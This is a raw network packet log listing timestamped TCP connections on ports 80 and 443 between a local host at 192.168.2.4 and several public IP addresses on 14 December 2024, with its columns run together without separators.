                                                            Dec 14, 2024 10:10:04.627301931 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:04.627402067 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:04.676908970 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:04.676935911 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:04.717000961 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:04.914879084 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:04.914980888 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:04.915163994 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:04.915357113 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:04.915389061 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:04.937830925 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:04.937916994 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:04.938292027 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:04.938292980 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:04.938426971 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.626703024 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.627074957 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.627104998 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.628766060 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.628848076 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.632952929 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.633035898 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.633161068 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.633169889 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.641032934 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.641379118 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.641469955 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.644999027 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.645103931 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.645332098 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.645523071 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.679681063 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.694928885 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:06.694989920 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:06.741178036 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:07.497596025 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:07.499624968 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:07.503900051 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:07.504313946 CET49740443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:07.504336119 CET44349740142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:07.506243944 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:07.547408104 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:08.364737034 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:08.365305901 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:08.365391016 CET44349741142.250.181.99192.168.2.4
                                                            Dec 14, 2024 10:10:08.365468025 CET49741443192.168.2.4142.250.181.99
                                                            Dec 14, 2024 10:10:09.085402012 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:09.143583059 CET4974480192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:09.205821037 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:09.205984116 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:09.206218004 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:09.264075994 CET804974468.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:09.264333010 CET4974480192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:09.326217890 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:10.985299110 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:10.986869097 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:10.986907959 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:10.986948967 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:10.993910074 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:10.993947029 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:10.994002104 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.000025034 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.000057936 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.000096083 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.008012056 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.008095026 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.008135080 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.015645027 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.015721083 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.106868982 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.110285044 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.110516071 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.113754988 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.153958082 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.178855896 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.180407047 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.180520058 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.183924913 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.187653065 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.187721968 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.191255093 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.194591999 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.194688082 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.199801922 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.201695919 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.201759100 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.208293915 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.209947109 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.210058928 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.216573000 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.218449116 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.218523026 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.224965096 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.226780891 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.226870060 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.233436108 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.235228062 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.235342979 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.241868973 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.243695021 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.243779898 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.250339031 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.252083063 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.252144098 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.273922920 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.275763988 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.275830030 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.300314903 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.302102089 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.302280903 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.371058941 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.372874022 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.373049974 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.376312971 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.380220890 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.380280018 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.383374929 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.383409023 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.383464098 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.390412092 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.394006968 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.394041061 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.394062996 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.401058912 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.401134968 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.404577017 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.404609919 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.404666901 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.412149906 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.412231922 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.412285089 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.418642044 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.418843031 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.418899059 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.425852060 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.425884962 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.425935030 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.434549093 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.434581041 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.434636116 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.440607071 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:11.492012024 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:11.921600103 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:11.921641111 CET44349745104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:11.921691895 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:11.922034979 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:11.922080994 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:11.922137022 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:11.922445059 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:11.922466993 CET44349745104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:11.922693014 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:11.922713995 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.146475077 CET44349745104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.146716118 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.146744967 CET44349745104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.148401022 CET44349745104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.148489952 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.149499893 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.149499893 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.149591923 CET44349745104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.149596930 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.149708986 CET49745443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.149935007 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.149975061 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.150165081 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.150219917 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.150227070 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.155472994 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.155694008 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.155714989 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.157500029 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.157574892 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.158504963 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.158560991 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.158560991 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.158596992 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.158809900 CET44349746104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.158821106 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.158885002 CET49746443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.158996105 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.159080029 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:13.159288883 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.159423113 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:13.159449100 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.297211885 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:14.297368050 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:14.297439098 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:14.377615929 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.377940893 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.377963066 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.379393101 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.379446030 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.380513906 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.380593061 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.380713940 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.380722046 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.428704023 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.467921972 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.468285084 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.468327999 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.471602917 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.471668005 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.472040892 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.472135067 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.521011114 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.521030903 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.567199945 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.630886078 CET8049723217.20.58.98192.168.2.4
                                                            Dec 14, 2024 10:10:14.631023884 CET4972380192.168.2.4217.20.58.98
                                                            Dec 14, 2024 10:10:14.634042025 CET4972380192.168.2.4217.20.58.98
                                                            Dec 14, 2024 10:10:14.753761053 CET8049723217.20.58.98192.168.2.4
                                                            Dec 14, 2024 10:10:14.813792944 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.813941002 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.814063072 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.814142942 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.814886093 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:14.814918041 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:14.821481943 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.821701050 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.821770906 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.827960014 CET49748443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.827996969 CET44349748104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.842145920 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:14.887330055 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:14.953310966 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:14.953349113 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:14.953535080 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:14.953732967 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:14.953742027 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:15.161047935 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.161178112 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.164166927 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.164232016 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.166414976 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.166625023 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.166687965 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.178910017 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.178988934 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.179168940 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.179234028 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.179646969 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.185273886 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.191431999 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.191509008 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.191623926 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.191689968 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.191757917 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.351285934 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.355468988 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.355734110 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.355830908 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.365159035 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.365413904 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.365475893 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.373600006 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.373761892 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.373789072 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.373972893 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.374325991 CET49749443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.374391079 CET44349749104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.384239912 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.384349108 CET44349752104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.384464025 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.385020971 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:15.385073900 CET44349752104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:15.992090940 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:15.992147923 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:16.177567959 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.177844048 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.177867889 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.179538012 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.179606915 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.180505037 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.180584908 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.180687904 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.180695057 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.232182026 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.604345083 CET44349752104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:16.604634047 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.604712009 CET44349752104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:16.608266115 CET44349752104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:16.608350992 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.608647108 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.608647108 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.608684063 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.608829975 CET44349752104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:16.608902931 CET49752443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.608905077 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.608989954 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:16.609076023 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.609257936 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:16.609285116 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:16.629863024 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.630162954 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.630242109 CET4434975135.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.630299091 CET49751443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.630778074 CET4974380192.168.2.468.70.164.7
                                                            Dec 14, 2024 10:10:16.631211042 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.631292105 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.631377935 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.631557941 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:16.631596088 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:16.750766993 CET804974368.70.164.7192.168.2.4
                                                            Dec 14, 2024 10:10:17.830388069 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:17.830648899 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:17.830741882 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:17.831223011 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:17.831666946 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:17.831794977 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:17.831890106 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:17.843022108 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:17.843220949 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:17.843283892 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:17.844244957 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:17.844324112 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:17.844666004 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:17.844743967 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:17.844754934 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:17.875368118 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:17.887419939 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:17.895031929 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:17.895092010 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:17.941345930 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:18.266134024 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:18.266525030 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:18.266611099 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:18.266788960 CET49755443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:18.266829014 CET44349755104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:18.273222923 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:18.273264885 CET44349757104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:18.273468018 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:18.273632050 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:18.273653984 CET44349757104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:18.359565020 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:18.359848976 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:18.359945059 CET4434975635.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:10:18.360019922 CET49756443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:10:18.415302992 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:18.415352106 CET44349758172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:18.415424109 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:18.415684938 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:18.415705919 CET44349758172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:19.495184898 CET44349757104.21.67.40192.168.2.4
